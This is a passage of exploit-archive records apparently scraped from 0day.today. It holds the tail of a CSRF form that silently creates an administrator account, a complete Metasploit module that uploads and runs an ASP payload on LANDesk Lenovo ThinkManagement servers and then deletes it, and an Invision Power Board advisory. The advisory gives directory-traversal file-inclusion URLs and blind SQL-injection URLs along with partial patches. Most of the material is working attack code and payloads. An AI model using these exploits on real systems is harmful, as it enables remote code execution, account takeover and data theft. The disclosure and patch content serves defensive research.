name=\"contact_email\" value=\"[email\u00a0protected]\" />\r\n<input type=\"hidden\" name=\"contact_pager\" value=\"\" />\r\n<input type=\"hidden\" name=\"contact_template_id\" value=\"\" />\r\n<input type=\"hidden\" name=\"contact_enable_notifications[contact_enable_notifications]\" value=\"2\" />\r\n<input type=\"hidden\" name=\"timeperiod_tp_id\" value=\"\" />\r\n<input type=\"hidden\" name=\"timeperiod_tp_id2\" value=\"\" />\r\n<input type=\"hidden\" name=\"contact_oreon[contact_oreon]\" value=\"1\" />\r\n<input type=\"hidden\" name=\"contact_passwd\" value=\"123123\" />\r\n<input type=\"hidden\" name=\"contact_passwd2\" value=\"123123\" />\r\n<input type=\"hidden\" name=\"contact_lang\" value=\"en_US\" />\r\n<input type=\"hidden\" name=\"contact_admin[contact_admin]\" value=\"1\" />\r\n<input type=\"hidden\" name=\"contact_autologin_key\" value=\"\" />\r\n<input type=\"hidden\" name=\"contact_auth_type\" value=\"local\" />\r\n<input type=\"hidden\" name=\"contact_acl_groups[]\" value=\"31\" />\r\n<input type=\"hidden\" name=\"contact_acl_groups[]\" value=\"32\" />\r\n<input type=\"hidden\" name=\"contact_acl_groups[]\" value=\"34\" />\r\n<input type=\"hidden\" name=\"contact_address1\" value=\"Neverland\" />\r\n<input type=\"hidden\" name=\"contact_address2\" value=\"\" />\r\n<input type=\"hidden\" name=\"contact_address3\" value=\"101\" />\r\n<input type=\"hidden\" name=\"contact_address4\" value=\"\" />\r\n<input type=\"hidden\" name=\"contact_address5\" value=\"\" />\r\n<input type=\"hidden\" name=\"contact_address6\" value=\"\" />\r\n<input type=\"hidden\" name=\"contact_activate[contact_activate]\" value=\"1\" />\r\n<input type=\"hidden\" name=\"contact_comment\" value=\"comment-vuln-xss-t00t\" />\r\n<input type=\"hidden\" name=\"action[action]\" value=\"1\" />\r\n<input type=\"hidden\" name=\"submitA\" value=\"Save\" />\r\n<input type=\"hidden\" name=\"contact_register\" value=\"1\" />\r\n<input type=\"hidden\" name=\"contact_id\" value=\"\" />\r\n<input type=\"hidden\" name=\"o\" value=\"a\" />\r\n<input type=\"hidden\" name=\"initialValues\" value=\"a:0:{}\" />\r\n<input type=\"submit\" value=\"Submit request\" />\r\n</form>\r\n</body>\r\n</html>\n\n# 0day.today [2018-04-11] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/24302"}, {"lastseen": "2018-04-14T11:45:38", "references": [], "description": "Exploit for windows platform in category remote exploits", "edition": 2, "reporter": "metasploit", "published": "2012-04-08T00:00:00", "title": "LANDesk Lenovo ThinkManagement Console Remote Command Execution", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-14T11:45:38", "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "value": 2.8}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-04-08T00:00:00", "id": "1337DAY-ID-18006", "href": "https://0day.today/exploit/description/18006", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n \r\n def initialize\r\n super(\r\n 'Name' => 'LANDesk Lenovo ThinkManagement Console Remote Command Execution',\r\n 'Description' => %q{\r\n This module can be used to execute a payload on LANDesk Lenovo\r\n ThinkManagement Suite 9.0.2 and 9.0.3.\r\n \r\n The payload is uploaded as an ASP script by sending a specially crafted\r\n SOAP request to \"/landesk/managementsuite/core/core.anonymous/ServerSetup.asmx\"\r\n , via a \"RunAMTCommand\" operation with the command '-PutUpdateFileCore'\r\n as the argument.\r\n \r\n After execution, the ASP script with the payload is deleted by sending\r\n another specially crafted SOAP request to \"WSVulnerabilityCore/VulCore.asmx\"\r\n via a \"SetTaskLogByFile\" operation.\r\n },\r\n 'Author' => [\r\n 'Andrea Micalizzi', # aka rgod - Vulnerability Discovery and PoC\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'Version' => '$Revision: $',\r\n 'Platform' => 'win',\r\n 'References' =>\r\n [\r\n ['CVE', '2012-1195'],\r\n ['CVE', '2012-1196'],\r\n ['OSVDB', '79276'],\r\n ['OSVDB', '79277'],\r\n ['BID', '52023'],\r\n ['URL', 'http://www.exploit-db.com/exploits/18622/'],\r\n ['URL', 'http://www.exploit-db.com/exploits/18623/']\r\n ],\r\n 'Targets' =>\r\n [\r\n [ 'LANDesk Lenovo ThinkManagement Suite 9.0.2 / 9.0.3 / Microsoft Windows Server 2003 SP2', { } ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Feb 15 2012'\r\n )\r\n \r\n register_options(\r\n [\r\n OptString.new('PATH', [ true, \"The URI path of the LANDesk Lenovo ThinkManagement Console\", '/'])\r\n ], self.class)\r\n end\r\n \r\n def exploit\r\n \r\n peer = \"#{rhost}:#{rport}\"\r\n \r\n # Generate the ASP containing the EXE containing the payload\r\n exe = generate_payload_exe\r\n asp = Msf::Util::EXE.to_exe_asp(exe)\r\n \r\n # htmlentities like encoding\r\n asp = asp.gsub(\"&\", \"&\").gsub(\"\\\"\", \"\"\").gsub(\"'\", \"'\").gsub(\"<\", \"<\").gsub(\">\", \">\")\r\n \r\n uri_path = (datastore['PATH'][-1,1] == \"/\" ? datastore['PATH'] : datastore['PATH'] + \"/\")\r\n upload_random = rand_text_alpha(rand(6) + 6)\r\n upload_xml_path = \"ldlogon\\\\#{upload_random}.asp\"\r\n \r\n soap = <<-eos\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <RunAMTCommand xmlns=\"http://tempuri.org/\">\r\n <Command>-PutUpdateFileCore</Command>\r\n <Data1>#{rand_text_alpha(rand(4) + 4)}</Data1>\r\n <Data2>#{upload_xml_path}</Data2>\r\n <Data3>#{asp}</Data3>\r\n <ReturnString>#{rand_text_alpha(rand(4) + 4)}</ReturnString>\r\n </RunAMTCommand>\r\n </soap:Body>\r\n</soap:Envelope>\r\n eos\r\n \r\n #\r\n # UPLOAD\r\n #\r\n attack_url = uri_path + \"landesk/managementsuite/core/core.anonymous/ServerSetup.asmx\"\r\n print_status(\"#{peer} - Uploading #{asp.length} bytes through #{attack_url}...\")\r\n \r\n res = send_request_cgi({\r\n 'uri' => attack_url,\r\n 'method' => 'POST',\r\n 'ctype' => 'text/xml; charset=utf-8',\r\n 'headers' => {\r\n 'SOAPAction' => \"\\\"http://tempuri.org/RunAMTCommand\\\"\",\r\n },\r\n 'data' => soap,\r\n }, 20)\r\n \r\n if (! res)\r\n print_status(\"#{peer} - Timeout: Trying to execute the payload anyway\")\r\n elsif (res.code < 200 or res.code >= 300)\r\n print_error(\"#{peer} - Upload failed on #{attack_url} [#{res.code} #{res.message}]\")\r\n return\r\n end\r\n \r\n #\r\n # EXECUTE\r\n #\r\n upload_path = uri_path + \"ldlogon/#{upload_random}.asp\"\r\n print_status(\"#{peer} - Executing #{upload_path}...\")\r\n \r\n res = send_request_cgi({\r\n 'uri' => upload_path,\r\n 'method' => 'GET'\r\n }, 20)\r\n \r\n if (! res)\r\n print_error(\"#{peer} - Execution failed on #{upload_path} [No Response]\")\r\n return\r\n end\r\n \r\n if (res.code < 200 or res.code >= 300)\r\n print_error(\"#{peer} - Execution failed on #{upload_path} [#{res.code} #{res.message}]\")\r\n return\r\n end\r\n \r\n \r\n #\r\n # DELETE\r\n #\r\n soap = <<-eos\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <SetTaskLogByFile xmlns=\"http://tempuri.org/\">\r\n <computerIdn>1</computerIdn>\r\n <taskid>1</taskid>\r\n <filename>../#{upload_random}.asp</filename>\r\n </SetTaskLogByFile>\r\n </soap:Body>\r\n</soap:Envelope>\r\n eos\r\n \r\n attack_url = uri_path + \"WSVulnerabilityCore/VulCore.asmx\"\r\n print_status(\"#{peer} - Deleting #{upload_path} through #{attack_url}...\")\r\n \r\n res = send_request_cgi({\r\n 'uri' => attack_url,\r\n 'method' => 'POST',\r\n 'ctype' => 'text/xml; charset=utf-8',\r\n 'headers' => {\r\n 'SOAPAction' => \"\\\"http://tempuri.org/SetTaskLogByFile\\\"\",\r\n },\r\n 'data' => soap,\r\n }, 20)\r\n \r\n if (! res)\r\n print_error(\"#{peer} - Deletion failed at #{attack_url} [No Response]\")\r\n return\r\n elsif (res.code < 200 or res.code >= 300)\r\n print_error(\"#{peer} - Deletion failed at #{attack_url} [#{res.code} #{res.message}]\")\r\n return\r\n end\r\n \r\n handler\r\n end\r\n \r\nend\r\n\r\n\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18006"}, {"lastseen": "2018-04-05T21:45:26", "references": [], "description": "Exploit for unknown platform in category web applications", "edition": 2, "reporter": "Dawid Golunski", "published": "2009-12-04T00:00:00", "title": "Invision Power Board <= 3.0.4 LFI / 2.3.6 ; 3.0.4 SQL Injection", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-05T21:45:26", "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/", "value": 9.0}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2009-12-04T00:00:00", "id": "1337DAY-ID-10083", "href": "https://0day.today/exploit/description/10083", "sourceData": "===============================================================\r\nInvision Power Board <= 3.0.4 LFI / 2.3.6 ; 3.0.4 SQL Injection\r\n===============================================================\r\n\r\n=============================================\r\n- Severity: Moderately High\r\n=============================================\r\n \r\nI. VULNERABILITY\r\n-------------------------\r\nInvision Power Board <= 3.0.4 Local PHP File Inclusion and SQL Injection\r\nInvision Power Board <= 2.3.6 SQL Injection\r\n \r\nII. BACKGROUND\r\n-------------------------\r\n \r\nInvision Power Board (IPB) is a professional forum system that has been built from the ground up with speed and security in mind, taking advantage of object\r\n \r\noriented code, highly-optimized SQL queries, and the fast PHP engine. A\r\n \r\ncomprehensive administration control panel is included to help you keep your board running smoothly. Moderators will also enjoy the full range of options available to them via built-in tools and moderators control panel. Members will appreciate the ability to subscribe to topics, send private messages, and\r\n \r\nperform a host of other options through the user control panel.\r\n \r\nIII. INTRODUCTION\r\n-------------------------\r\n \r\nFor a good understanding of the vulnerabilities it is necessary to be familiar\r\n \r\nwith the way IPB handles input data. Below is a quick trace of input\r\nvalidation process. The code snippets come from IPB version 3.0.4.\r\n \r\nline | file: admin/sources/base/ipsRegistry.php\r\n352 | static public function init()\r\n353 | {\r\n... |\r\n... |\r\n462 | IPSLib::cleanGlobals( $_GET );\r\n463 | IPSLib::cleanGlobals( $_POST );\r\n464 | IPSLib::cleanGlobals( $_COOKIE );\r\n465 | IPSLib::cleanGlobals( $_REQUEST );\r\n466 |\r\n467 | # GET first\r\n468 | $input = IPSLib::parseIncomingRecursively( $_GET, array() );\r\n469 |\r\n470 | # Then overwrite with POST\r\n \r\n471 | self::$request = IPSLib::parseIncomingRecursively( $_POST, $input );\r\n \r\n... |\r\n \r\n \r\nThe init() function cleans the input data passed via methods like GET, POST or\r\n \r\nothers at the start of each request to the forum before any of the input\r\nvariables are processed.\r\n \r\nLet's look into sanitization performed by cleanGlobals function:\r\n \r\nline | file: admin/sources/base/core.php\r\n1644 | static public function cleanGlobals( &$data, $iteration = 0 )\r\n1645 | {\r\n... |\r\n1654 | foreach( $data as $k => $v )\r\n1655 | {\r\n1656 | if ( is_array( $v ) )\r\n1657 | {\r\n \r\n1658 | self::cleanGlobals( $data[ $k ], ++ $iteration );\r\n \r\n1659 | }\r\n1660 | else\r\n1661 | {\r\n1662 | # Null byte characters\r\n1663 | $v = str_replace( chr('0') , '', $v );\r\n1664 | $v = str_replace( \"\\0\" , '', $v );\r\n1665 | $v = str_replace( \"\\x00\" , '', $v );\r\n1666 | $v = str_replace( '%00' , '', $v );\r\n1667 |\r\n1668 | # File traversal\r\n \r\n1669 | $v = str_replace( \"../\", \"../\", $v );\r\n \r\n1670 |\r\n1671 | $data[ $k ] = $v;\r\n1672 | }\r\n1673 | }\r\n1674 | }\r\n \r\n \r\nAs we can see the function removes null characters and \"../\" sequences from\r\n \r\nincoming data to prevent unwanted file inclusion.\r\n \r\nThe next function that affects the input is:\r\n \r\nline | file: admin/sources/base/core.php\r\n \r\n1573 | static public function parseIncomingRecursively( &$data, $input=array(), $iteration = 0 )\r\n \r\n1574 | {\r\n... |\r\n1583 | foreach( $data as $k => $v )\r\n1584 | {\r\n1585 | if ( is_array( $v ) )\r\n1586 | {\r\n \r\n1587 | $input[ $k ] = self::parseIncomingRecursively( $data[ $k ], array(), ++$iteration );\r\n \r\n1588 | }\r\n1589 | else\r\n1590 | {\r\n1591 | $k = IPSText::parseCleanKey( $k );\r\n \r\n1592 | $v = IPSText::parseCleanValue( $v, false );\r\n \r\n1593 |\r\n1594 | $input[ $k ] = $v;\r\n1595 | }\r\n1596 | }\r\n1597 |\r\n1598 | return $input;\r\n1599 | }\r\n \r\nThe purpose of this function is to clean the key/value pairs of an array\r\n \r\npassed to it with help of the parseCleanKey and parseCleanValue functions. The first one can be skipped as neither of the attacks described later on require\r\n \r\nspecial characters inside variable names. The other looks as follows:\r\n \r\nline | file: admin/sources/base/core.php\r\n4100 | static public function parseCleanValue( $val, $postParse=true )\r\n4101 | {\r\n4102 | if ( $val == \"\" )\r\n4103 | {\r\n4104 | return \"\";\r\n4105 | }\r\n4106 |\r\n \r\n4107 | $val = str_replace( \" \", \" \", IPSText::stripslashes($val) );\r\n \r\n4108 |\r\n4109 | # Convert all carriage return combos\r\n \r\n4110 | $val = str_replace( array( \"\\r\\n\", \"\\n\\r\", \"\\r\" ), \"\\n\", $val );\r\n \r\n4111 |\r\n4112 | $val = str_replace( \"&\", \"&\", $val );\r\n4113 | $val = str_replace( \"<!--\", \"<!--\", $val );\r\n4114 | $val = str_replace( \"-->\", \"-->\", $val );\r\n4115 | $val = str_ireplace( \"<script\", \"<script\", $val );\r\n4116 | $val = str_replace( \">\", \">\", $val );\r\n4117 | $val = str_replace( \"<\", \"<\", $val );\r\n4118 | $val = str_replace( '\"', \"\"\", $val );\r\n \r\n4119 | $val = str_replace( \"\\n\", \"<br />\", $val ); // Convert literal newlines\r\n \r\n4120 | $val = str_replace( \"$\", \"$\", $val );\r\n4121 | $val = str_replace( \"!\", \"!\", $val );\r\n \r\n4122 | $val = str_replace( \"'\", \"'\", $val ); // IMPORTANT: It helps to increase sql query safety.\r\n \r\n4123 |\r\n4124 | if ( IPS_ALLOW_UNICODE )\r\n... |\r\n \r\n \r\nThe function cleans input data from characters used typically in XSS and SQL\r\n \r\nattacks.\r\n \r\n \r\nThe resulting array containing sanitized input data from GET/POST methods is stored in ipsRegistry::$request array (as we can see on the first code\r\n \r\nlisting).\r\n \r\nIV. LOCAL FILE INCLUSION VULNERABILITY\r\n-------------------------\r\n \r\n1. Description.\r\n \r\n \r\nIt is possible to include an arbitrary php file stored on the server in any\r\n \r\nlocation (accessible by the php/web server process) by exploiting the\r\nfollowing code of IPB 3.0.4:\r\n \r\nline | file: admin/sources/base/ipsController.php\r\n142 |public function getCommand( ipsRegistry $registry )\r\n143 |{\r\n144 | $_NOW = IPSDebug::getMemoryDebugFlag();\r\n145 |\r\n146 | $module = ipsRegistry::$current_module;\r\n147 | $section = ipsRegistry::$current_section;\r\n \r\n148 | $filepath = IPSLib::getAppDir( IPS_APP_COMPONENT ) . '/' . self::$modules_dir . '/' . $module . '/';\r\n \r\n149 |\r\n150 | /* Got a section? */\r\n151 | if ( ! $section )\r\n152 | {\r\n \r\n153 | if ( file_exists( $filepath . 'defaultSection.php' ) )\r\n \r\n154 | {\r\n155 | $DEFAULT_SECTION = '';\r\n \r\n156 | require( $filepath . 'defaultSection.php' );\r\n \r\n157 |\r\n158 | if ( $DEFAULT_SECTION )\r\n159 | {\r\n160 | $section = $DEFAULT_SECTION;\r\n161 | }\r\n162 | }\r\n163 | }\r\n164 |\r\n \r\n165 | $classname = self::$class_dir . '_' . IPS_APP_COMPONENT . '_' . $module . '_' . $section;\r\n \r\n166 |\r\n167 | if ( file_exists( $filepath . 'manualResolver.php' ) )\r\n168 | {\r\n169 | require_once( $filepath . 'manualResolver.php' );\r\n \r\n170 | $classname = self::$class_dir . '_' . IPS_APP_COMPONENT . '_' . $module . '_manualResolver';\r\n \r\n171 | }\r\n172 | else if ( file_exists( $filepath . $section . '.php' ) )\r\n173 | {\r\n174 | require_once( $filepath . $section . '.php' );\r\n175 | }\r\n... |\r\n \r\n \r\nThe require_once function on line 174 uses a variable $section to create a\r\n \r\npath to a php file that is to be included. The variable is assigned the\r\nfollowing value:\r\n \r\nline | file: admin/sources/base/ipsRegistry.php\r\n \r\n1654 | ipsRegistry::$current_section = ( ipsRegistry:: $request['section'] ) ? ipsRegistry::$request['section'] : '';\r\n \r\nwhich as we know from the introduction comes from a user supplied variable\r\n \r\n(via GET or POST method).\r\n \r\n \r\nAlthough the whole $request array has been filtered out to prevent directory\r\n \r\ntraversal and arbitrary file inclusion it is possible to evade these\r\n \r\nmeasures due to a bug in a function implementing the \"friendly URLs\" feature\r\n \r\nintroduced in version 3.0.0 of the IPB forum.\r\n \r\nline | file: admin/sources/base/ipsRegistry.php\r\n1188 | private static function _fUrlInit()\r\n1189 | {\r\n... |\r\n1195 | if ( ipsRegistry::$settings['use_friendly_urls'] )\r\n1196 | {\r\n... |\r\n... |\r\n \r\n1235 | $uri = $_SERVER['REQUEST_URI'] ? $_SERVER['REQUEST_URI'] : @getenv('REQUEST_URI');\r\n \r\n1236 |\r\n1237 | $_toTest = $uri; //( $qs ) ? $qs : $uri;\r\n... |\r\n... |\r\n... |\r\n1306 | //-----------------------------------------\r\n1307 | // If using query string furl, extract any\r\n1308 | // secondary query string.\r\n \r\n1309 | // Ex: http://localhost/index.php?/path/file.html? key=value\r\n \r\n1310 | // Will pull the key=value properly\r\n1311 | //-----------------------------------------\r\n1312 |\r\n1313 | if( substr_count( $_toTest, '?' ) > 1 )\r\n1314 | {\r\n \r\n1315 | $_secondQueryString = substr( $_toTest, strrpos( $_toTest, '?' ) + 1 ); 1316 | $_secondParams = explode( '&', $_secondQueryString );\r\n \r\n1317 |\r\n1318 | if( count($_secondParams) )\r\n1319 | {\r\n1320 | foreach( $_secondParams as $_param )\r\n1321 | {\r\n1322 | list( $k, $v ) = explode( '=', $_param );\r\n1323 |\r\n1324 | $k = IPSText::parseCleanKey( $k );\r\n1325 | $v = IPSText::parseCleanValue( $v );\r\n1326 |\r\n1327 | $_GET[ $k ] = $v;\r\n1328 | $_REQUEST[ $k ] = $v;\r\n1329 | $_urlBits[ $k ] = $v;\r\n1330 |\r\n1331 | ipsRegistry::$request[ $k ] = $v;\r\n1332 | }\r\n1333 | }\r\n1334 | }\r\n1335 | }\r\n... |\r\n \r\nThe above code allows for a secondary query string from which additional\r\n \r\nvariables are retrieved and saved in the $request array as well as $_GET and\r\n \r\n$_REQUEST globals.\r\nIt takes a query string from a previously not cleaned global:\r\n \r\n$_SERVER['REQUEST_URI'] and fails to check if the variables supplied in the\r\n \r\nrequest URI string already exist in any of the arrays as well as to call\r\ncleanGlobals function to sanitize the values.\r\n \r\n \r\nA variable named 'section' can be passed in the secondary query string in order to bypass filtration of \"../\" and %00 sequences, effectively allowing to traverse directories and include any given php file within the system leading\r\n \r\nto a local file inclusion attack.\r\n \r\n \r\nNote: Omitting '.php' extension (to include arbitrary file like /etc/ passwd)\r\n \r\nby using a NULL character will not be possible in this case as a\r\n \r\ncombination of %00 in the REQUEST_URI will not get decoded by the web server\r\n \r\nautomatically and there is no urldecode function to decode it before the\r\nrequire_once call either.\r\n \r\n \r\nVersions older than 3.0.4 have a different implementation of the friendly url\r\n \r\nfeature, but are also vulnerable in the same way.\r\n \r\n2. Proof of concept.\r\n \r\n \r\nThis issue is trivial to exploit with a web browser and a known location of a\r\n \r\nphp file residing on the target system. Authorisation is not required.\r\n \r\nFor example, the following URL in case of IPB 3.0.4:\r\n \r\n \r\nhttp://server-with-ipb-forum-3.0.4.com/forum/index.php?app=core&module=global§ion=register&any= ? section = ../../../../../../../../../../../../../../../../../../../../../../../../../../tmp /inc\r\n \r\nor the following in case of versions older than IPB 3.0.4:\r\n \r\n \r\nhttp://server-with-ipb-forum-3.0.[0-3].com/forum/index.php? app=core&module=global§ion=register/register/ page__section__ ../../../../../../../../../../../../../../../../../../../../../tmp/inc__\r\n \r\nwill result in including /tmp/inc.php file and executing code it contains.\r\n \r\nV. SQL INJECTION VULNERABILITY\r\n-------------------------\r\n \r\n1. Description.\r\n \r\n \r\nAn SQL Injection attack is possible due to an insufficient sanitization in the\r\n \r\nfollowing function:\r\n \r\nline | file: admin/applications/forums/sources/classes/moderate.php\r\n1820 | /**\r\n1821 | * Create 'where' clause for SQL forum pruning\r\n1822 | *\r\n1823 | * @access public\r\n1824 | * @return boolean\r\n1825 | */\r\n \r\n1826 | public function sqlPruneCreate( $forum_id, $starter_id=\"\", $topic_state=\"\", $post_min=\"\", $date_exp=\"\", $ignore_pin=\"\" )\r\n \r\n1827 | {\r\n1828 | $sql = 'forum_id=' . intval($forum_id);\r\n1829 |\r\n1830 | if ( intval($date_exp) )\r\n1831 | {\r\n1832 | $sql .= \" AND last_post < {$date_exp}\";\r\n1833 | }\r\n1834 |\r\n1835 | if ( intval($starter_id) )\r\n1836 | {\r\n1837 | $sql .= \" AND starter_id={$starter_id}\";\r\n1838 |\r\n1839 | }\r\n1840 |\r\n1841 | if ( intval($post_min) )\r\n1842 | {\r\n1843 | $sql .= \" AND posts < {$post_min}\";\r\n1844 | }\r\n1845 |\r\n1846 | if ($topic_state != 'all')\r\n1847 | {\r\n1848 | if ($topic_state)\r\n1849 | {\r\n1850 | $sql .= \" AND state='{$topic_state}'\";\r\n1851 | }\r\n1852 | }\r\n1853 |\r\n1854 | if ( $ignore_pin != \"\" )\r\n1855 | {\r\n1856 | $sql .= \" AND pinned=0\";\r\n1857 | }\r\n1858 |\r\n1859 |\r\n1860 | return $sql;\r\n1861 | }\r\n \r\n \r\nAll of the IF statements with intval() are to ensure that the arguments passed to the function are numeric before they are placed inside a WHERE clause of a\r\n \r\nquery.\r\n \r\nBecause of the way that intval() works, it is possible to fool the function by passing a string like: '1 OR sleep(5) '. In such case intval() will return a value of 1 thus satisfying the IF conditions and causing the string to be\r\n \r\nplaced inside the query.\r\n \r\nThe sqlPruneCreate function is used 2 times in a code that performs some\r\nmoderator's tasks. One invocation of it can be found in:\r\n \r\n \r\nline | file: admin/applications/forums/modules_public/moderate/ moderate.php\r\n \r\n2323 | protected function _pruneMove()\r\n2324 | {\r\n2325 | //-----------------------------------------\r\n2326 | // Check\r\n2327 | //-----------------------------------------\r\n2328 |\r\n2329 | $this->_resetModerator( $this->topic['forum_id'] );\r\n2330 |\r\n2331 | $this->_genericPermissionCheck( 'mass_move' );\r\n2332 |\r\n2333 | ///-----------------------------------------\r\n2334 | // SET UP\r\n2335 | //-----------------------------------------\r\n2336 |\r\n \r\n2337 | $pergo = intval( $this->request['pergo'] ) ? intval( $this->request['pergo'] ) : 50;\r\n \r\n2338 | $max = intval( $this->request['max'] );\r\n2339 | $current = intval($this->request['current']);\r\n2340 | $maxdone = $pergo + $current;\r\n2341 | $tid_array = array();\r\n2342 | $starter = trim( $this->request['starter'] );\r\n2343 | $state = trim( $this->request['state'] );\r\n2344 | $posts = intval( $this->request['posts'] );\r\n2345 | $dateline = intval( $this->request['dateline'] );\r\n2346 | $source = $this->forum['id'];\r\n2347 | $moveto = intval($this->request['df']);\r\n2348 | $date = 0;\r\n2349 | $ignore_pin = intval( $this->request['ignore_pin'] );\r\n2350 |\r\n2351 | if( $dateline )\r\n2352 | {\r\n2353 | $date = time() - $dateline*60*60*24;\r\n2354 | }\r\n2355 |\r\n2356 | //-----------------------------------------\r\n2357 | // Carry on...\r\n2358 | //-----------------------------------------\r\n2359 |\r\n \r\n2360 | $dbPruneWhere = $this->modLibrary->sqlPruneCreate( $this- >forum['id'], $starter, $state, $posts, $date, $ignore_pin );\r\n \r\n2361 |\r\n2362 | $this->DB->build( array(\r\n2363 | 'select' => 'tid',\r\n2364 | 'from' => 'topics',\r\n2365 | 'where' => $dbPruneWhere,\r\n2366 | 'limit' => array( 0, $pergo ),\r\n2367 | ) );\r\n2368 | $batch = $this->DB->execute();\r\n... |\r\n \r\nAs we can see there are 2 variables that come from a user and are not\r\n \r\nconverted to a number before they are passed to the sqlPruneCreate function:\r\n \r\n$starter and $state.\r\n \r\nThe second variable cannot be used in SQL Injection as it will be treated as a string and embraced with quotes by sqlPruneCreate. A string passed in $starter variable will be placed unquoted in the query as long as the first character is a number allowing a logged in moderator to perform an SQL Injection attack.\r\n \r\nThe vulnerability is somewhat tricky to exploit as there are quite a few\r\n \r\nrestrictions that make creating a successful sql attack vector difficult. Only the WHERE statement can be controlled, quotes are filtered, and UNION or sub selects are prohibited too (at least in case of a MySQL driver). To top it all, the results of the query are not outputted to the browser so it will have\r\n \r\nto be a blind injection.\r\n \r\nNevertheless a crafty attacker might issue a series of requests that might\r\n \r\nallow him to gain some information about the target system or even read\r\n \r\nfiles from the disk depending on permissions granted to the db account that is used by the forum. Other attacks might also be possible when a database engine\r\n \r\nother than MySQL is used.\r\n \r\n2. Proof of concept.\r\n \r\nIf a logged in user with moderator privileges requests an URL like:\r\n \r\nhttp://server-with-ipb-3.x.x-forum.com/forum/?app=forums&module=moderate§ion=moderate&f=1&do=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&starter=1%20AND%20starter_id=1%20OR%20substr(version(),1,1)=5%20AND%20sleep(15)%20--%20skip%20&auth_key=c4276b77602767228faa9760eb4a5abd\r\n \r\nin case of IPB 3.x, or:\r\n \r\nhttp://server-with-ipb-2.x.x-forum.com/forum/?act=mod&f=1&CODE=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&starter=1%20AND%20starter_id=1%20OR%20substr(version(),1,1)=5%20AND%20sleep(16)%20--%20skip%20&auth_key=040c4a6e768d626b4c05a4bb0fbf315c\r\n \r\nin case of IPB 2.x.\r\n \r\nA query similar to:\r\n \r\n \r\nSELECT tid FROM ibftopics WHERE forum_id=1 AND starter_id=1 AND starter_id=1 OR substr(version(),1,1)=5 AND sleep(15) -- skip AND state='open' AND pinned=0\r\n \r\nLIMIT 0,50\r\n \r\nwill be run against the database.\r\n \r\nThe query will check if a major version of MySQL server is equal to 5. If that is the case a sleep function will be run which will slow down the page load by\r\n \r\n15 seconds thus revealing the result of the query.\r\n \r\n \r\nFor this to work a valid auth_key needs to be supplied (that can be obtained by going to any of the forums, clicking Forum Management button and selecting Prune/Mass Move feature). Source ($f) and Destination ($df) forums parameters\r\n \r\nin the URL might also need adjusting.\r\n \r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n \r\nThe Local PHP File Inclusion vulnerability can be especially dangerous in a shared hosting environment. Even if server has been configured to prevent\r\n \r\nusers from reading each other's document roots (web server/PHP process\r\n \r\nrunning in a context of the site's owner), an attacker that has an account on the same server as the targeted site could use the vulnerability to place a php file in a shared directory like /tmp and cause the IPB forum on the target\r\n \r\nto execute his code thus gaining access equivalent to the owner of the\r\nwebsite.\r\n \r\n \r\nThe SQL Injection vulnerability is only a threat in case there are moderators\r\n \r\non the forum that cannot be fully trusted or if an attacker manages to\r\nsteal/guess their passwords. Possible risks in case of a successful\r\nexploitation of this flaw have been described in the previous section.\r\n \r\nVII. SYSTEMS AFFECTED\r\n-------------------------\r\n \r\nAll of the IPB versions of the 3.x series (including the newest release of\r\n \r\n3.0.4) are affected by the Local PHP File Inclusion and SQL Injection\r\nvulnerabilities.\r\n \r\n \r\nProbably most if not all of IPB releases of the 2.x series (including 2.3.6)\r\n \r\nare affected by the SQL Injection vulnerability.\r\n \r\nVIII. SOLUTION\r\n-------------------------\r\n \r\nVendor has been informed about the vulnerabilities and should be releasing\r\n \r\npatches soon.\r\n \r\n \r\nI attach 2 patches for the current versions of both 2.x and 3.x series that\r\n \r\ncan be used as a temporary solution.\r\n \r\nIPB 3.0.4 patch:\r\n \r\n \r\ndiff -Nprub ipb304/admin/applications/forums/sources/classes/ moderate.php ipb304-patched/admin/applications/forums/sources/classes/ moderate.php --- ipb304/admin/applications/forums/sources/classes/moderate.php 2009-10-08 16:34:50.000000000 +0100 +++ ipb304-patched/admin/applications/forums/sources/classes/ moderate.php 2009-11-29 01:01:49.000000000 +0000\r\n \r\n@@ -1829,18 +1829,18 @@ class moderatorLibrary\r\n \r\n if ( intval($date_exp) )\r\n {\r\n- $sql .= \" AND last_post < {$date_exp}\";\r\n+ $sql .= \" AND last_post < \". intval($date_exp);\r\n }\r\n \r\n if ( intval($starter_id) )\r\n {\r\n- $sql .= \" AND starter_id={$starter_id}\";\r\n+ $sql .= \" AND starter_id=\". intval($starter_id);\r\n \r\n }\r\n \r\n if ( intval($post_min) )\r\n {\r\n- $sql .= \" AND posts < {$post_min}\";\r\n+ $sql .= \" AND posts < \". intval($post_min);\r\n }\r\n \r\n if ($topic_state != 'all')\r\n \r\ndiff -Nprub 